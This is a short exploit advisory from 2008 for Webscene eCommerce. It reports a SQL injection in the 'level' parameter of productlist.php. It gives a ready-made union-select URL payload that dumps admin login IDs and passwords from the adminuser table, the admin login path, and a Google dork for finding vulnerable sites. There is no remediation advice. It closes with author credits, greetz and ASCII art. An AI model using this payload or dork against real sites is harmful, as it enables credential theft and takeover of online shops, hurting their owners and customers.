#################################################################################

#

#  Webscene eCommerce (level) Remote Sql Injection

#

#  vendor : 
http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm

#

#################################################################################

#

#

#       Bug Found By :Angela Chang (14-10-2008)

#

#       contact: angel[at]ch4ng.cc

#

#

################################################################################

#

#

#      Greetz: nyubi & Vrs-Chk

#

#

###############################################################################



vuln file : productlist.php



Input passed to the "level" is not properly verified

before being used. This can be exploited to execute

remote sql injection.



exploit : http://somehost/productlist.php?categoryid=20&level=[sql]

          http://somehost/productlist.php?categoryid=20&level=-4 union select 
concat(loginid,0x2f,password) from adminuser--



Login admin : http://somehost/admin/



         

Google dork : inurl:productlist.php?categoryid= level



########################################################################

                   __ _             _                              _            
            __ _  

  __ _    _ _     / _` |   ___     | |    __ _      o O O   __    | |_     __ _ 
   _ _     / _` | 

 / _` |  | ' \    \__, |  / -_)    | |   / _` |    o       / _|   | ' \   / _` 
|  | ' \    \__, | 

 \__,_|  |_||_|   |___/   \___|   _|_|_  \__,_|   TS__[O]  \__|_  |_||_|  
\__,_|  |_||_|   |___/  

_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 
{======|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 

"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
 



Reply via email to